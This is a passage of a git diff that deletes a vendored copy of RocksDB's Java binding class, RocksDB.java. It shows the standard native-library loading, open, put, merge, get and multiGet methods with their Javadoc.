diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDB.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDB.java
deleted file mode 100644
index eda0950..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/RocksDB.java
+++ /dev/null
@@ -1,2384 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.*;
-import java.io.IOException;
-import java.util.concurrent.atomic.AtomicInteger;
-import java.util.concurrent.atomic.AtomicReference;
-
-import org.rocksdb.util.Environment;
-
-/**
- * A RocksDB is a persistent ordered map from keys to values.  It is safe for
- * concurrent access from multiple threads without any external synchronization.
- * All methods of this class could potentially throw RocksDBException, which
- * indicates sth wrong at the RocksDB library side and the call failed.
- */
-public class RocksDB extends RocksObject {
-  public static final byte[] DEFAULT_COLUMN_FAMILY = "default".getBytes();
-  public static final int NOT_FOUND = -1;
-
-  private enum LibraryState {
-    NOT_LOADED,
-    LOADING,
-    LOADED
-  }
-
-  private static AtomicReference<LibraryState> libraryLoaded
-      = new AtomicReference<>(LibraryState.NOT_LOADED);
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Loads the necessary library files.
-   * Calling this method twice will have no effect.
-   * By default the method extracts the shared library for loading at
-   * java.io.tmpdir, however, you can override this temporary location by
-   * setting the environment variable ROCKSDB_SHAREDLIB_DIR.
-   */
-  public static void loadLibrary() {
-    if (libraryLoaded.get() == LibraryState.LOADED) {
-      return;
-    }
-
-    if (libraryLoaded.compareAndSet(LibraryState.NOT_LOADED,
-        LibraryState.LOADING)) {
-      final String tmpDir = System.getenv("ROCKSDB_SHAREDLIB_DIR");
-      // loading possibly necessary libraries.
-      for (final CompressionType compressionType : CompressionType.values()) {
-        try {
-          if (compressionType.getLibraryName() != null) {
-            System.loadLibrary(compressionType.getLibraryName());
-          }
-        } catch (UnsatisfiedLinkError e) {
-          // since it may be optional, we ignore its loading failure here.
-        }
-      }
-      try {
-        NativeLibraryLoader.getInstance().loadLibrary(tmpDir);
-      } catch (IOException e) {
-        libraryLoaded.set(LibraryState.NOT_LOADED);
-        throw new RuntimeException("Unable to load the RocksDB shared library"
-            + e);
-      }
-
-      libraryLoaded.set(LibraryState.LOADED);
-      return;
-    }
-
-    while (libraryLoaded.get() == LibraryState.LOADING) {
-      try {
-        Thread.sleep(10);
-      } catch(final InterruptedException e) {
-        //ignore
-      }
-    }
-  }
-
-  /**
-   * Tries to load the necessary library files from the given list of
-   * directories.
-   *
-   * @param paths a list of strings where each describes a directory
-   *     of a library.
-   */
-  public static void loadLibrary(final List<String> paths) {
-    if (libraryLoaded.get() == LibraryState.LOADED) {
-      return;
-    }
-
-    if (libraryLoaded.compareAndSet(LibraryState.NOT_LOADED,
-        LibraryState.LOADING)) {
-      for (final CompressionType compressionType : CompressionType.values()) {
-        if (compressionType.equals(CompressionType.NO_COMPRESSION)) {
-          continue;
-        }
-        for (final String path : paths) {
-          try {
-            System.load(path + "/" + Environment.getSharedLibraryFileName(
-                compressionType.getLibraryName()));
-            break;
-          } catch (UnsatisfiedLinkError e) {
-            // since they are optional, we ignore loading fails.
-          }
-        }
-      }
-      boolean success = false;
-      UnsatisfiedLinkError err = null;
-      for (final String path : paths) {
-        try {
-          System.load(path + "/" +
-              Environment.getJniLibraryFileName("rocksdbjni"));
-          success = true;
-          break;
-        } catch (UnsatisfiedLinkError e) {
-          err = e;
-        }
-      }
-      if (!success) {
-        libraryLoaded.set(LibraryState.NOT_LOADED);
-        throw err;
-      }
-
-      libraryLoaded.set(LibraryState.LOADED);
-      return;
-    }
-
-    while (libraryLoaded.get() == LibraryState.LOADING) {
-      try {
-        Thread.sleep(10);
-      } catch(final InterruptedException e) {
-        //ignore
-      }
-    }
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance given
-   * the path to the database using the default options w/ createIfMissing
-   * set to true.
-   *
-   * @param path the path to the rocksdb.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @see Options#setCreateIfMissing(boolean)
-   */
-  public static RocksDB open(final String path) throws RocksDBException {
-    // This allows to use the rocksjni default Options instead of
-    // the c++ one.
-    Options options = new Options();
-    options.setCreateIfMissing(true);
-    return open(options, path);
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance given
-   * the path to the database using the specified options and db path and a list
-   * of column family names.
-   * <p>
-   * If opened in read write mode every existing column family name must be
-   * passed within the list to this method.</p>
-   * <p>
-   * If opened in read-only mode only a subset of existing column families must
-   * be passed to this method.</p>
-   * <p>
-   * Options instance *should* not be disposed before all DBs using this options
-   * instance have been closed. If user doesn't call options dispose explicitly,
-   * then this options instance will be GC'd automatically</p>
-   * <p>
-   * ColumnFamily handles are disposed when the RocksDB instance is disposed.
-   * </p>
-   *
-   * @param path the path to the rocksdb.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @see DBOptions#setCreateIfMissing(boolean)
-   */
-  public static RocksDB open(final String path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles)
-      throws RocksDBException {
-    // This allows to use the rocksjni default Options instead of
-    // the c++ one.
-    DBOptions options = new DBOptions();
-    return open(options, path, columnFamilyDescriptors, columnFamilyHandles);
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance given
-   * the path to the database using the specified options and db path.
-   *
-   * <p>
-   * Options instance *should* not be disposed before all DBs using this options
-   * instance have been closed. If user doesn't call options dispose explicitly,
-   * then this options instance will be GC'd automatically.</p>
-   * <p>
-   * Options instance can be re-used to open multiple DBs if DB statistics is
-   * not used. If DB statistics are required, then its recommended to open DB
-   * with new Options instance as underlying native statistics instance does not
-   * use any locks to prevent concurrent updates.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param path the path to the rocksdb.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @see Options#setCreateIfMissing(boolean)
-   */
-  public static RocksDB open(final Options options, final String path)
-      throws RocksDBException {
-    // when non-default Options is used, keeping an Options reference
-    // in RocksDB can prevent Java to GC during the life-time of
-    // the currently-created RocksDB.
-    final RocksDB db = new RocksDB(open(options.nativeHandle_, path));
-    db.storeOptionsInstance(options);
-    return db;
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance given
-   * the path to the database using the specified options and db path and a list
-   * of column family names.
-   * <p>
-   * If opened in read write mode every existing column family name must be
-   * passed within the list to this method.</p>
-   * <p>
-   * If opened in read-only mode only a subset of existing column families must
-   * be passed to this method.</p>
-   * <p>
-   * Options instance *should* not be disposed before all DBs using this options
-   * instance have been closed. If user doesn't call options dispose explicitly,
-   * then this options instance will be GC'd automatically.</p>
-   * <p>
-   * Options instance can be re-used to open multiple DBs if DB statistics is
-   * not used. If DB statistics are required, then its recommended to open DB
-   * with new Options instance as underlying native statistics instance does not
-   * use any locks to prevent concurrent updates.</p>
-   * <p>
-   * ColumnFamily handles are disposed when the RocksDB instance is disposed.
-   * </p>
-   *
-   * @param options {@link org.rocksdb.DBOptions} instance.
-   * @param path the path to the rocksdb.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @see DBOptions#setCreateIfMissing(boolean)
-   */
-  public static RocksDB open(final DBOptions options, final String path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles)
-      throws RocksDBException {
-
-    final byte[][] cfNames = new byte[columnFamilyDescriptors.size()][];
-    final long[] cfOptionHandles = new long[columnFamilyDescriptors.size()];
-    for (int i = 0; i < columnFamilyDescriptors.size(); i++) {
-      final ColumnFamilyDescriptor cfDescriptor = columnFamilyDescriptors
-          .get(i);
-      cfNames[i] = cfDescriptor.columnFamilyName();
-      cfOptionHandles[i] = cfDescriptor.columnFamilyOptions().nativeHandle_;
-    }
-
-    final long[] handles = open(options.nativeHandle_, path, cfNames,
-        cfOptionHandles);
-    final RocksDB db = new RocksDB(handles[0]);
-    db.storeOptionsInstance(options);
-
-    for (int i = 1; i < handles.length; i++) {
-      columnFamilyHandles.add(new ColumnFamilyHandle(db, handles[i]));
-    }
-
-    return db;
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance in
-   * Read-Only mode given the path to the database using the default
-   * options.
-   *
-   * @param path the path to the RocksDB.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static RocksDB openReadOnly(final String path)
-      throws RocksDBException {
-    // This allows to use the rocksjni default Options instead of
-    // the c++ one.
-    Options options = new Options();
-    return openReadOnly(options, path);
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance in
-   * Read-Only mode given the path to the database using the default
-   * options.
-   *
-   * @param path the path to the RocksDB.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static RocksDB openReadOnly(final String path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles)
-      throws RocksDBException {
-    // This allows to use the rocksjni default Options instead of
-    // the c++ one.
-    final DBOptions options = new DBOptions();
-    return openReadOnly(options, path, columnFamilyDescriptors,
-        columnFamilyHandles);
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance in
-   * Read-Only mode given the path to the database using the specified
-   * options and db path.
-   *
-   * Options instance *should* not be disposed before all DBs using this options
-   * instance have been closed. If user doesn't call options dispose explicitly,
-   * then this options instance will be GC'd automatically.
-   *
-   * @param options {@link Options} instance.
-   * @param path the path to the RocksDB.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static RocksDB openReadOnly(final Options options, final String path)
-      throws RocksDBException {
-    // when non-default Options is used, keeping an Options reference
-    // in RocksDB can prevent Java to GC during the life-time of
-    // the currently-created RocksDB.
-    final RocksDB db = new RocksDB(openROnly(options.nativeHandle_, path));
-    db.storeOptionsInstance(options);
-    return db;
-  }
-
-  /**
-   * The factory constructor of RocksDB that opens a RocksDB instance in
-   * Read-Only mode given the path to the database using the specified
-   * options and db path.
-   *
-   * <p>This open method allows to open RocksDB using a subset of available
-   * column families</p>
-   * <p>Options instance *should* not be disposed before all DBs using this
-   * options instance have been closed. If user doesn't call options dispose
-   * explicitly,then this options instance will be GC'd automatically.</p>
-   *
-   * @param options {@link DBOptions} instance.
-   * @param path the path to the RocksDB.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @return a {@link RocksDB} instance on success, null if the specified
-   *     {@link RocksDB} can not be opened.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static RocksDB openReadOnly(final DBOptions options, final String path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles)
-      throws RocksDBException {
-    // when non-default Options is used, keeping an Options reference
-    // in RocksDB can prevent Java to GC during the life-time of
-    // the currently-created RocksDB.
-
-    final byte[][] cfNames = new byte[columnFamilyDescriptors.size()][];
-    final long[] cfOptionHandles = new long[columnFamilyDescriptors.size()];
-    for (int i = 0; i < columnFamilyDescriptors.size(); i++) {
-      final ColumnFamilyDescriptor cfDescriptor = columnFamilyDescriptors
-          .get(i);
-      cfNames[i] = cfDescriptor.columnFamilyName();
-      cfOptionHandles[i] = cfDescriptor.columnFamilyOptions().nativeHandle_;
-    }
-
-    final long[] handles = openROnly(options.nativeHandle_, path, cfNames,
-        cfOptionHandles);
-    final RocksDB db = new RocksDB(handles[0]);
-    db.storeOptionsInstance(options);
-
-    for (int i = 1; i < handles.length; i++) {
-      columnFamilyHandles.add(new ColumnFamilyHandle(db, handles[i]));
-    }
-
-    return db;
-  }
-  /**
-   * Static method to determine all available column families for a
-   * rocksdb database identified by path
-   *
-   * @param options Options for opening the database
-   * @param path Absolute path to rocksdb database
-   * @return List&lt;byte[]&gt; List containing the column family names
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public static List<byte[]> listColumnFamilies(final Options options,
-      final String path) throws RocksDBException {
-    return Arrays.asList(RocksDB.listColumnFamilies(options.nativeHandle_,
-        path));
-  }
-
-  private void storeOptionsInstance(DBOptionsInterface options) {
-    options_ = options;
-  }
-
-  /**
-   * Set the database entry for "key" to "value".
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final byte[] key, final byte[] value)
-      throws RocksDBException {
-    put(nativeHandle_, key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Set the database entry for "key" to "value" in the specified
-   * column family.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * throws IllegalArgumentException if column family is not present
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key, final byte[] value) throws RocksDBException {
-    put(nativeHandle_, key, 0, key.length, value, 0, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Set the database entry for "key" to "value".
-   *
-   * @param writeOpts {@link org.rocksdb.WriteOptions} instance.
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final WriteOptions writeOpts, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    put(nativeHandle_, writeOpts.nativeHandle_,
-        key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Set the database entry for "key" to "value" for the specified
-   * column family.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param writeOpts {@link org.rocksdb.WriteOptions} instance.
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * throws IllegalArgumentException if column family is not present
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @see IllegalArgumentException
-   */
-  public void put(final ColumnFamilyHandle columnFamilyHandle,
-      final WriteOptions writeOpts, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    put(nativeHandle_, writeOpts.nativeHandle_, key, 0, key.length, value,
-        0, value.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * If the key definitely does not exist in the database, then this method
-   * returns false, else true.
-   *
-   * This check is potentially lighter-weight than invoking DB::Get(). One way
-   * to make this lighter weight is to avoid doing any IOs.
-   *
-   * @param key byte array of a key to search for
-   * @param value StringBuilder instance which is a out parameter if a value is
-   *    found in block-cache.
-   * @return boolean value indicating if key does not exist or might exist.
-   */
-  public boolean keyMayExist(final byte[] key, final StringBuilder value) {
-    return keyMayExist(nativeHandle_, key, 0, key.length, value);
-  }
-
-  /**
-   * If the key definitely does not exist in the database, then this method
-   * returns false, else true.
-   *
-   * This check is potentially lighter-weight than invoking DB::Get(). One way
-   * to make this lighter weight is to avoid doing any IOs.
-   *
-   * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-   * @param key byte array of a key to search for
-   * @param value StringBuilder instance which is a out parameter if a value is
-   *    found in block-cache.
-   * @return boolean value indicating if key does not exist or might exist.
-   */
-  public boolean keyMayExist(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key, final StringBuilder value) {
-    return keyMayExist(nativeHandle_, key, 0, key.length,
-        columnFamilyHandle.nativeHandle_, value);
-  }
-
-  /**
-   * If the key definitely does not exist in the database, then this method
-   * returns false, else true.
-   *
-   * This check is potentially lighter-weight than invoking DB::Get(). One way
-   * to make this lighter weight is to avoid doing any IOs.
-   *
-   * @param readOptions {@link ReadOptions} instance
-   * @param key byte array of a key to search for
-   * @param value StringBuilder instance which is a out parameter if a value is
-   *    found in block-cache.
-   * @return boolean value indicating if key does not exist or might exist.
-   */
-  public boolean keyMayExist(final ReadOptions readOptions,
-      final byte[] key, final StringBuilder value) {
-    return keyMayExist(nativeHandle_, readOptions.nativeHandle_,
-        key, 0, key.length, value);
-  }
-
-  /**
-   * If the key definitely does not exist in the database, then this method
-   * returns false, else true.
-   *
-   * This check is potentially lighter-weight than invoking DB::Get(). One way
-   * to make this lighter weight is to avoid doing any IOs.
-   *
-   * @param readOptions {@link ReadOptions} instance
-   * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-   * @param key byte array of a key to search for
-   * @param value StringBuilder instance which is a out parameter if a value is
-   *    found in block-cache.
-   * @return boolean value indicating if key does not exist or might exist.
-   */
-  public boolean keyMayExist(final ReadOptions readOptions,
-      final ColumnFamilyHandle columnFamilyHandle, final byte[] key,
-      final StringBuilder value) {
-    return keyMayExist(nativeHandle_, readOptions.nativeHandle_,
-        key, 0, key.length, columnFamilyHandle.nativeHandle_,
-        value);
-  }
-
-  /**
-   * Apply the specified updates to the database.
-   *
-   * @param writeOpts WriteOptions instance
-   * @param updates WriteBatch instance
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void write(final WriteOptions writeOpts, final WriteBatch updates)
-      throws RocksDBException {
-    write0(nativeHandle_, writeOpts.nativeHandle_, updates.nativeHandle_);
-  }
-
-  /**
-   * Apply the specified updates to the database.
-   *
-   * @param writeOpts WriteOptions instance
-   * @param updates WriteBatchWithIndex instance
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void write(final WriteOptions writeOpts,
-      final WriteBatchWithIndex updates) throws RocksDBException {
-    write1(nativeHandle_, writeOpts.nativeHandle_, updates.nativeHandle_);
-  }
-
-  /**
-   * Add merge operand for key/value pair.
-   *
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final byte[] key, final byte[] value)
-      throws RocksDBException {
-    merge(nativeHandle_, key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Add merge operand for key/value pair in a ColumnFamily.
-   *
-   * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key, final byte[] value) throws RocksDBException {
-    merge(nativeHandle_, key, 0, key.length, value, 0, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Add merge operand for key/value pair.
-   *
-   * @param writeOpts {@link WriteOptions} for this write.
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final WriteOptions writeOpts, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    merge(nativeHandle_, writeOpts.nativeHandle_,
-        key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Add merge operand for key/value pair.
-   *
-   * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-   * @param writeOpts {@link WriteOptions} for this write.
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final ColumnFamilyHandle columnFamilyHandle,
-      final WriteOptions writeOpts, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    merge(nativeHandle_, writeOpts.nativeHandle_,
-        key, 0, key.length, value, 0, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  // TODO(AR) we should improve the #get() API, returning -1 (RocksDB.NOT_FOUND) is not very nice
-  // when we could communicate better status into, also the C++ code show that -2 could be returned
-
-  /**
-   * Get the value associated with the specified key within column family*
-   * @param key the key to retrieve the value.
-   * @param value the out-value to receive the retrieved value.
-   * @return The size of the actual value that matches the specified
-   *     {@code key} in byte.  If the return value is greater than the
-   *     length of {@code value}, then it indicates that the size of the
-   *     input buffer {@code value} is insufficient and partial result will
-   *     be returned.  RocksDB.NOT_FOUND will be returned if the value not
-   *     found.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public int get(final byte[] key, final byte[] value) throws RocksDBException {
-    return get(nativeHandle_, key, 0, key.length, value, 0, value.length);
-  }
-
-  /**
-   * Get the value associated with the specified key within column family.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key the key to retrieve the value.
-   * @param value the out-value to receive the retrieved value.
-   * @return The size of the actual value that matches the specified
-   *     {@code key} in byte.  If the return value is greater than the
-   *     length of {@code value}, then it indicates that the size of the
-   *     input buffer {@code value} is insufficient and partial result will
-   *     be returned.  RocksDB.NOT_FOUND will be returned if the value not
-   *     found.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public int get(final ColumnFamilyHandle columnFamilyHandle, final byte[] key,
-      final byte[] value) throws RocksDBException, IllegalArgumentException {
-    return get(nativeHandle_, key, 0, key.length, value, 0, value.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Get the value associated with the specified key.
-   *
-   * @param opt {@link org.rocksdb.ReadOptions} instance.
-   * @param key the key to retrieve the value.
-   * @param value the out-value to receive the retrieved value.
-   * @return The size of the actual value that matches the specified
-   *     {@code key} in byte.  If the return value is greater than the
-   *     length of {@code value}, then it indicates that the size of the
-   *     input buffer {@code value} is insufficient and partial result will
-   *     be returned.  RocksDB.NOT_FOUND will be returned if the value not
-   *     found.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public int get(final ReadOptions opt, final byte[] key,
-      final byte[] value) throws RocksDBException {
-    return get(nativeHandle_, opt.nativeHandle_,
-               key, 0, key.length, value, 0, value.length);
-  }
-  /**
-   * Get the value associated with the specified key within column family.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param opt {@link org.rocksdb.ReadOptions} instance.
-   * @param key the key to retrieve the value.
-   * @param value the out-value to receive the retrieved value.
-   * @return The size of the actual value that matches the specified
-   *     {@code key} in byte.  If the return value is greater than the
-   *     length of {@code value}, then it indicates that the size of the
-   *     input buffer {@code value} is insufficient and partial result will
-   *     be returned.  RocksDB.NOT_FOUND will be returned if the value not
-   *     found.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public int get(final ColumnFamilyHandle columnFamilyHandle,
-      final ReadOptions opt, final byte[] key, final byte[] value)
-      throws RocksDBException {
-    return get(nativeHandle_, opt.nativeHandle_, key, 0, key.length, value,
-        0, value.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * The simplified version of get which returns a new byte array storing
-   * the value associated with the specified input key if any.  null will be
-   * returned if the specified key is not found.
-   *
-   * @param key the key retrieve the value.
-   * @return a byte array storing the value associated with the input key if
-   *     any.  null if it does not find the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public byte[] get(final byte[] key) throws RocksDBException {
-    return get(nativeHandle_, key, 0, key.length);
-  }
-
-  /**
-   * The simplified version of get which returns a new byte array storing
-   * the value associated with the specified input key if any.  null will be
-   * returned if the specified key is not found.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key the key retrieve the value.
-   * @return a byte array storing the value associated with the input key if
-   *     any.  null if it does not find the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public byte[] get(final ColumnFamilyHandle columnFamilyHandle,
-      final byte[] key) throws RocksDBException {
-    return get(nativeHandle_, key, 0, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * The simplified version of get which returns a new byte array storing
-   * the value associated with the specified input key if any.  null will be
-   * returned if the specified key is not found.
-   *
-   * @param key the key retrieve the value.
-   * @param opt Read options.
-   * @return a byte array storing the value associated with the input key if
-   *     any.  null if it does not find the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public byte[] get(final ReadOptions opt, final byte[] key)
-      throws RocksDBException {
-    return get(nativeHandle_, opt.nativeHandle_, key, 0, key.length);
-  }
-
-  /**
-   * The simplified version of get which returns a new byte array storing
-   * the value associated with the specified input key if any.  null will be
-   * returned if the specified key is not found.
-   *
-   * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-   *     instance
-   * @param key the key retrieve the value.
-   * @param opt Read options.
-   * @return a byte array storing the value associated with the input key if
-   *     any.  null if it does not find the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public byte[] get(final ColumnFamilyHandle columnFamilyHandle,
-      final ReadOptions opt, final byte[] key) throws RocksDBException {
-    return get(nativeHandle_, opt.nativeHandle_, key, 0, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Returns a map of keys for which values were found in DB.
-   *
-   * @param keys List of keys for which values need to be retrieved.
-   * @return Map where key of map is the key passed by user and value for map
-   * entry is the corresponding value in DB.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public Map<byte[], byte[]> multiGet(final List<byte[]> keys)
-      throws RocksDBException {
-    assert(keys.size() != 0);
-
-    final byte[][] keysArray = keys.toArray(new byte[keys.size()][]);
-    final int keyOffsets[] = new int[keysArray.length];
-    final int keyLengths[] = new int[keysArray.length];
-    for(int i = 0; i < keyLengths.length; i++) {
-      keyLengths[i] = keysArray[i].length;
-    }
-
-    final byte[][] values = multiGet(nativeHandle_, keysArray, keyOffsets,
-        keyLengths);
-
-    final Map<byte[], byte[]> keyValueMap =
-        new HashMap<>(computeCapacityHint(values.length));
-    for(int i = 0; i < values.length; i++) {
-      if(values[i] == null) {
-        continue;
-      }
-
-      keyValueMap.put(keys.get(i), values[i]);
-    }
-
-    return keyValueMap;
-  }
-
-  private static int computeCapacityHint(final int estimatedNumberOfItems) {
-    // Default load factor for HashMap is 0.75, so N * 1.5 will be at the load
-    // limit. We add +1 for a buffer.
-    return (int)Math.ceil(estimatedNumberOfItems * 1.5 + 1.0);
-  }
-
-  /**
-   * Returns a map of keys for which values were found in DB.
-   * <p>
-   * Note: Every key needs to have a related column family name in
-   * {@code columnFamilyHandleList}.
-   * </p>
-   *
-   * @param columnFamilyHandleList {@link java.util.List} containing
-   *     {@link org.rocksdb.ColumnFamilyHandle} instances.
-   * @param keys List of keys for which values need to be retrieved.
-   * @return Map where key of map is the key passed by user and value for map
-   * entry is the corresponding value in DB.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   * @throws IllegalArgumentException thrown if the size of passed keys is not
-   *    equal to the amount of passed column family handles.
-   */
-  public Map<byte[], byte[]> multiGet(
-      final List<ColumnFamilyHandle> columnFamilyHandleList,
-      final List<byte[]> keys) throws RocksDBException,
-      IllegalArgumentException {
-    assert(keys.size() != 0);
-    // Check if key size equals cfList size. If not a exception must be
-    // thrown. If not a Segmentation fault happens.
-    if (keys.size() != columnFamilyHandleList.size()) {
-        throw new IllegalArgumentException(
-            "For each key there must be a ColumnFamilyHandle.");
-    }
-    final long[] cfHandles = new long[columnFamilyHandleList.size()];
-    for (int i = 0; i < columnFamilyHandleList.size(); i++) {
-      cfHandles[i] = columnFamilyHandleList.get(i).nativeHandle_;
-    }
-
-    final byte[][] keysArray = keys.toArray(new byte[keys.size()][]);
-    final int keyOffsets[] = new int[keysArray.length];
-    final int keyLengths[] = new int[keysArray.length];
-    for(int i = 0; i < keyLengths.length; i++) {
-      keyLengths[i] = keysArray[i].length;
-    }
-
-    final byte[][] values = multiGet(nativeHandle_, keysArray, keyOffsets,
-        keyLengths, cfHandles);
-
-    final Map<byte[], byte[]> keyValueMap =
-        new HashMap<>(computeCapacityHint(values.length));
-    for(int i = 0; i < values.length; i++) {
-      if (values[i] == null) {
-        continue;
-      }
-      keyValueMap.put(keys.get(i), values[i]);
-    }
-    return keyValueMap;
-  }
-
-  /**
-   * Returns a map of keys for which values were found in DB.
-   *
-   * @param opt Read options.
-   * @param keys of keys for which values need to be retrieved.
-   * @return Map where key of map is the key passed by user and value for map
-   * entry is the corresponding value in DB.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
